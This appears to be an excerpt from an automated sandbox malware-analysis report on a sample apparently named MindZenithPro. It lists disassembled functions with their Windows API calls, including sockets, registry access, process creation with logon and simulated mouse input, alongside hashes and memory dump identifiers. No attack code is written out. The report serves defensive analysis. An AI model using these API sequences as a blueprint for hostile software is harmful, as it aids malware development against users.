                                    • Opcode Fuzzy Hash: 7f7274b778672762b92888424a88a674767f59f4b2196e4eb350ad6a0386934f
                                    • Instruction Fuzzy Hash: 80014FF69003187FE721A7909D89EEB776CDB08301F4045A6B706E2043EA74DE854B79
                                    Function 0043103C Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(00D5DD78,00D5DD78), ref: 0043104C
                                    • EnterCriticalSection.KERNEL32(00D5DD58,00000000), ref: 0043105E
                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0043106C
                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 0043107A
                                    • CloseHandle.KERNEL32(?), ref: 00431089
                                    • InterlockedExchange.KERNEL32(00D5DD78,000001F6), ref: 00431099
                                    • LeaveCriticalSection.KERNEL32(00D5DD58), ref: 004310A0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: b8cf3ebb155cb6bbc3d381d0fe90ced0a9deef1d7143be5d763bd43a6a1ff0a9
                                    • Instruction ID: 94efd2be7a855e22d1cb2fd41a603562b73214d4eb5c1ca2cdf42a90e0b6da9a
                                    • Opcode Fuzzy Hash: b8cf3ebb155cb6bbc3d381d0fe90ced0a9deef1d7143be5d763bd43a6a1ff0a9
                                    • Instruction Fuzzy Hash: 98F01932842B02ABD3611B64EE89AD6BB39BF04303F402022F20195CB1CB74D4A0CF99
                                    Function 004423E7 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00442547
                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00442568
                                    • WSAGetLastError.WSOCK32 ref: 00442579
                                    • htons.WSOCK32(?,?,?,?,?), ref: 00442662
                                    • inet_ntoa.WSOCK32(?), ref: 00442613
                                      • Part of subcall function 004240D3: _strlen.LIBCMT ref: 004240DD
                                      • Part of subcall function 004439AB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0043F393), ref: 004439C7
                                    • _strlen.LIBCMT ref: 004426BC
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                    • String ID:
                                    • API String ID: 3203458085-0
                                    • Opcode ID: 061b2596f34065463af9c72d590a151c15973da44dd8ef259b90d8aa49142540
                                    • Instruction ID: 6cb7b178d3af6a4e0aebdb383f40a23c67ab162bd837a03c8f22bb8db5729f73
                                    • Opcode Fuzzy Hash: 061b2596f34065463af9c72d590a151c15973da44dd8ef259b90d8aa49142540
                                    • Instruction Fuzzy Hash: C4B1F235204340AFD325DF24C895F2ABBA5AF84318F94854DF4568F3A2CBB5ED42CB92
                                    Function 003C63C7 Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 003C63ED
                                    • GetWindowRect.USER32(?,?), ref: 003C642E
                                    • ScreenToClient.USER32(?,?), ref: 003C6456
                                    • GetClientRect.USER32(?,?), ref: 003C6594
                                    • GetWindowRect.USER32(?,?), ref: 003C65B5
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: d0e78e6fea921c3067d3e5e0588e9a9f119b59a15b94690067a8c2d4a06c4867
                                    • Instruction ID: c580baa406b09717acdd54f80ac4f05af07ba0a904f4830c61a05df16b32ce8d
                                    • Opcode Fuzzy Hash: d0e78e6fea921c3067d3e5e0588e9a9f119b59a15b94690067a8c2d4a06c4867
                                    • Instruction Fuzzy Hash: BCB15834A0064ADBCB14CFA9C541BEAB7B1FF58310F14842EE8AAE7690DB34E951DF54
                                    Function 003F0477 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 003F037A
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F0396
                                    • __allrem.LIBCMT ref: 003F03AD
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F03CB
                                    • __allrem.LIBCMT ref: 003F03E2
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F0400
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 0181af5d6def77a816a33025d0b367658057732776b04c8e99597411025af8ef
                                    • Instruction ID: 231f9ef3bcd1a51ffbf1c24edd2c708878c55a603688781d641388115370c691
                                    • Opcode Fuzzy Hash: 0181af5d6def77a816a33025d0b367658057732776b04c8e99597411025af8ef
                                    • Instruction Fuzzy Hash: 7E81097160070DABD72A9E6DCC85B7E73A9AF40324F15452EF710DA6C3E7B0D9008B54
                                    Function 003F654E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003E8629,003E8629,?,?,?,003F679F,00000001,00000001,8BE85006), ref: 003F65A8
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003F679F,00000001,00000001,8BE85006,?,?,?), ref: 003F662E
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003F6728
                                    • __freea.LIBCMT ref: 003F6735
                                      • Part of subcall function 003F3B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E0145,?,?,00430F03,0000FFFF), ref: 003F3BA2
                                    • __freea.LIBCMT ref: 003F673E
                                    • __freea.LIBCMT ref: 003F6763
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: b604aa1f9fddcb8b74127f015ab345defdbddbaa3e03498aaa2cd748713817d3
                                    • Instruction ID: 5bd1fedf701f28969c728780c70173e19f4c0122abdd65f0462c7f411d28feb6
                                    • Opcode Fuzzy Hash: b604aa1f9fddcb8b74127f015ab345defdbddbaa3e03498aaa2cd748713817d3
                                    • Instruction Fuzzy Hash: 8951D47260021AABDB26AF64CC83EBF77A9EF85754F154639FE04DA150EB34DC44C690
                                    Function 0044C362 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003CA1D4: _wcslen.LIBCMT ref: 003CA1DE
                                      • Part of subcall function 0044D11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0044BE35,?,?), ref: 0044D13C
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D178
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D1E6
                                      • Part of subcall function 0044D11F: _wcslen.LIBCMT ref: 0044D21C
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0044C451
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0044C4AC
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0044C4F1
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0044C520
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0044C57A
                                    • RegCloseKey.ADVAPI32(?), ref: 0044C586
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 1120388591-0
                                    • Opcode ID: 99a5f676aefd47ec67fd6661a1f38883ce67dfb58016ba64f3313535f4837fb7
                                    • Instruction ID: d533587a4a681e3870cfad88e90e457f213d917176bd3305133b969d693c57ed
                                    • Opcode Fuzzy Hash: 99a5f676aefd47ec67fd6661a1f38883ce67dfb58016ba64f3313535f4837fb7
                                    • Instruction Fuzzy Hash: F581CD31209241AFD755DF24C8D1E2ABBE5FF84308F08895DF4598B2A2CB35ED46CB96
                                    Function 0043987B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3914: _wcslen.LIBCMT ref: 003C3919
                                      • Part of subcall function 003C7467: _wcslen.LIBCMT ref: 003C747A
                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00439C54
                                    • _wcslen.LIBCMT ref: 00439C75
                                    • _wcslen.LIBCMT ref: 00439C9C
                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00439CF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen$FileName$OpenSave
                                    • String ID: X
                                    • API String ID: 83654149-3081909835
                                    • Opcode ID: ebb24599ae8bb5ed249b504e4460f8f3d5ee4f5ed5c840613845e21413d93a74
                                    • Instruction ID: 0cfa4263fc9a7e07d37164cd8cc80d02d5d22324936780a770395810e0cd294b
                                    • Opcode Fuzzy Hash: ebb24599ae8bb5ed249b504e4460f8f3d5ee4f5ed5c840613845e21413d93a74
                                    • Instruction Fuzzy Hash: 40E180715083508FC725DF24C881F6AB7E0BF88314F14896EE8899B3A2DB75ED45CB96
                                    Function 00436BFD Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00436C4B
                                    • CoInitialize.OLE32(00000000), ref: 00436DA8
                                    • CoCreateInstance.OLE32(00460CE0,00000000,00000001,00460B50,?), ref: 00436DBF
                                    • CoUninitialize.OLE32 ref: 00437043
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 886957087-24824748
                                    • Opcode ID: d27bc95a19038baba099bf167f1ec8c0f46705b6e08b61a06787a23e5d046da6
                                    • Instruction ID: e0c8ffb85be63c5b7d6b1c37da4c041c77a5abd48fb48ed4e6a865ffcdc1ea7c
                                    • Opcode Fuzzy Hash: d27bc95a19038baba099bf167f1ec8c0f46705b6e08b61a06787a23e5d046da6
                                    • Instruction Fuzzy Hash: A7D14971608301AFD315EF24C881E6BB7E8AF88708F10896DF595CB261DB71ED45CB92
                                    Function 003D9442 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • BeginPaint.USER32(?,?,?), ref: 003D9477
                                    • GetWindowRect.USER32(?,?), ref: 003D94DB
                                    • ScreenToClient.USER32(?,?), ref: 003D94F8
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003D9509
                                    • EndPaint.USER32(?,?,?,?,?), ref: 003D9557
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004177FA
                                      • Part of subcall function 003D956F: BeginPath.GDI32(00000000), ref: 003D958D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 3050599898-0
                                    • Opcode ID: a04fe32e7929e22e1532881999a04a942298e760f52ce26b829261d11868ac9c
                                    • Instruction ID: c98bc4b3ead1c6aa685b8c6443764be0c3c0654149938ec73057d871c7fb0ac8
                                    • Opcode Fuzzy Hash: a04fe32e7929e22e1532881999a04a942298e760f52ce26b829261d11868ac9c
                                    • Instruction Fuzzy Hash: 5741B371605301AFC712DF24EC84FAA7BB9EF55720F04023BF964872A2C774A845DB65
                                    Function 004588C7 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0041F95A,00000000,?,?,00000000,?,00402A40,00000004,00000000,00000000), ref: 00458938
                                    • EnableWindow.USER32(?,00000000), ref: 0045895E
                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004589BD
                                    • ShowWindow.USER32(?,00000004), ref: 004589D1
                                    • EnableWindow.USER32(?,00000001), ref: 004589F7
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00458A1B
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: 5ed64874002a6dde974f37354bd357428f429e2f2be2dd2d58e8f151da646967
                                    • Instruction ID: 48d4bad6ce4ad6ca3869e846b56654223768bad746777510abcf7331477eab82
                                    • Opcode Fuzzy Hash: 5ed64874002a6dde974f37354bd357428f429e2f2be2dd2d58e8f151da646967
                                    • Instruction Fuzzy Hash: 7C41D6B0601240AFDB25CF14C989FB57BA0FB45316F18017EE9096B273CF759849CB4A
                                    Function 00442A61 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 00442A6F
                                      • Part of subcall function 0043EC5D: GetWindowRect.USER32(?,?), ref: 0043EC75
                                    • GetDesktopWindow.USER32 ref: 00442A99
                                    • GetWindowRect.USER32(00000000), ref: 00442AA0
                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00442ADC
                                    • GetCursorPos.USER32(?), ref: 00442B08
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442B66
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                    • String ID:
                                    • API String ID: 2387181109-0
                                    • Opcode ID: fa3704096db0c2a8461e3f8ce90ed2b2a3ace9ad34cd7e06c8485e3685593d81
                                    • Instruction ID: ec55fc7f3ee171b464edd403047c17357fef5aa5b1e59d80aeb572e4f0a7a336
                                    • Opcode Fuzzy Hash: fa3704096db0c2a8461e3f8ce90ed2b2a3ace9ad34cd7e06c8485e3685593d81
                                    • Instruction Fuzzy Hash: A5314472505316AFD720DF14C848F9BB7A9FF88304F40091EF889A7281DB74E909CB9A
                                    Function 00425376 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 0042538E
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004253AB
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004253E3
                                    • _wcslen.LIBCMT ref: 00425401
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00425409
                                    • _wcsstr.LIBVCRUNTIME ref: 00425413
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                    • String ID:
                                    • API String ID: 72514467-0
                                    • Opcode ID: 431c89f6014ba2953ceaae6d52b4918796800b71f9acf784012e544bbfa49560
                                    • Instruction ID: 0fd3e7cda94b381c1b83983945a3fdd2628462ae7c5f0372adceba2837ba3334
                                    • Opcode Fuzzy Hash: 431c89f6014ba2953ceaae6d52b4918796800b71f9acf784012e544bbfa49560
                                    • Instruction Fuzzy Hash: 11212932704664BBEB166B29AC09F7FBB98DF44750F50803AFC05CE192DAB4CC818664
                                    Function 0045838D Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000F0), ref: 004583D1
                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 004583F6
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0045840E
                                    • GetSystemMetrics.USER32(00000004), ref: 00458437
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0043BF1C,00000000), ref: 00458457
                                      • Part of subcall function 003D9DD1: GetWindowLongW.USER32(00000000,000000EB), ref: 003D9DE2
                                    • GetSystemMetrics.USER32(00000004), ref: 00458442
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: 5317da68ad9c892fc5632afcc36779008f20ce266999e73f33000ce810201da3
                                    • Instruction ID: 289c297ecfc54503c808f182fbfa7023929d04662676e9a1ea0bcbdb2cef33bf
                                    • Opcode Fuzzy Hash: 5317da68ad9c892fc5632afcc36779008f20ce266999e73f33000ce810201da3
                                    • Instruction Fuzzy Hash: 69217471610316AFCB249F39CC0466A37A5EF45326F15463EAD26D62E2EE34C855CB18
                                    Function 00421BB0 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00421BE1
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00421BE8
                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00421BF7
                                    • CloseHandle.KERNEL32(00000004), ref: 00421C02
                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00421C31
                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00421C45
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                    • String ID:
                                    • API String ID: 1413079979-0
                                    • Opcode ID: 55899af1e6e966ab9c3e4523ebbfe761cbf07e70d05247498bdfe1e8ccddfe4e
                                    • Instruction ID: f14d5d8cb960a0105c11614a9493200e30809a8bdf9435f0291edcef670d15ea
                                    • Opcode Fuzzy Hash: 55899af1e6e966ab9c3e4523ebbfe761cbf07e70d05247498bdfe1e8ccddfe4e
                                    • Instruction Fuzzy Hash: 3611597260020DABDF118F94ED49FDE7BA9EF08309F044025FA00A21A1D375DD61DB25
                                    Function 003E36D2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,003E36C9,003E3335), ref: 003E36E0
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003E36EE
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003E3707
                                    • SetLastError.KERNEL32(00000000,?,003E36C9,003E3335), ref: 003E3759
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
